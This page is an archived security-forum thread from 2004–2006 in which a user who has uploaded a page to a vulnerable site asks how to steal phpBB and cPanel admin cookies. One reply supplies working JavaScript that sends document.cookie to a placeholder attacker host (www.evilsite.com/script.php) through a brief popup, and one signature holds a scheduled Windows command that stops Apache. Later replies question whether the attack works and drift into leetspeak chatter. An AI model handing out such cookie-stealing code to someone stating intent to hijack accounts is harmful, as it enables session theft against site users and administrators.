 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 214
 Members: 0
 Total: 214
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
again cookie stealin' |
|
 Posted: Fri Oct 01, 2004 8:49 pm |
 |
|
| Roberto |
| Regular user |
 |
|
| Joined: Sep 01, 2004 |
| Posts: 8 |
|
|
|
 |
|
 |
|
i manage to upload html page(in another words javascripts ) to a vulnerable site.
the bug is not related with phpbb.but i manage to upload.
i may direct people to that uploaded page,it is easy
but what should i write to the uploaded page so i can steal phpbb cookies of that site?or admin cookie of the cpanel of that site?
of course i will upload an evil script to my site.
thanks again |
|
|
|
|
| Posted: Sun Dec 12, 2004 12:13 pm |
|
|
| Oguz |
| Regular user |
|
|
| Joined: Nov 29, 2004 |
| Posts: 7 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| Posted: Sun Dec 12, 2004 1:55 pm |
|
|
| Heintz |
| Valuable expert |
|
|
| Joined: Jun 12, 2004 |
| Posts: 88 |
| Location: Estonia/Sweden |
|
|
|
|
|
|
there are very many ways you could do it i'll write here one from which
you can make a better one.
html 1
| Code: |
<html>
<head>
<title>reperdalaj</title>
<script language="JavaScript" src="foo.js"></script>
</head>
<body>
hi i'm evil page!
</body>
</html>
|
foo.js 1
| Code: |
var query = "www.evilsite.com/script.php?string=" + document.cookie;
var nWindow = window.open(query,'nwin','height=1;width=1');
nWindow.close();
|
this loads a popup window for very short time.
after remembering that there are pop-up blockers this will not probably work on many users.
you could make a frame instead and join the html and js, learning html and basic javascript helps. so take your time and google.  |
|
_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
|
Re: again cookie stealin' |
|
| Posted: Sat Dec 18, 2004 3:59 pm |
|
|
| emrag |
| Regular user |
|
|
| Joined: Jun 03, 2004 |
| Posts: 20 |
| Location: TURKEY |
|
|
|
|
|
|
| Roberto wrote: | i manage to upload html page(in another words javascripts ) to a vulnerable site.
the bug is not related with phpbb.but i manage to upload.
i may direct people to that uploaded page,it is easy
but what should i write to the uploaded page so i can steal phpbb cookies of that site?or admin cookie of the cpanel of that site?
of course i will upload an evil script to my site.
thanks again |
i think this isn't possible so you want a phpbb's cookie but there is no XSS in it. you can't get a site's cookie with another site's XSS. |
|
|
|
|
| Posted: Sun Feb 27, 2005 8:48 pm |
|
|
| Alkaen |
| Regular user |
 |
|
| Joined: Feb 16, 2005 |
| Posts: 5 |
| Location: Bahrain - Aldair |
|
|
|
|
|
|
Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.
41k43n |
|
_________________
Alkaen with u.. |
|
|
|
| Posted: Fri Mar 04, 2005 6:20 am |
|
|
| HaCkZataN |
| Regular user |
|
|
| Joined: Feb 23, 2005 |
| Posts: 11 |
|
|
|
|
|
|
|
| Alkaen wrote: | Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.
41k43n |
i did get shit
lol of course i got that but plz write neat thats ricicule** |
|
|
|
|
| Posted: Tue Dec 05, 2006 7:43 pm |
|
|
| faifas |
| Regular user |
|
|
| Joined: Feb 25, 2005 |
| Posts: 8 |
|
|
|
|
|
|
|
| HaCkZataN wrote: | | Alkaen wrote: | Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.
41k43n |
i did get shit
lol of course i got that but plz write neat thats ricicule** |
3 = e
5 = s
$ = 5 = s
etc. |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
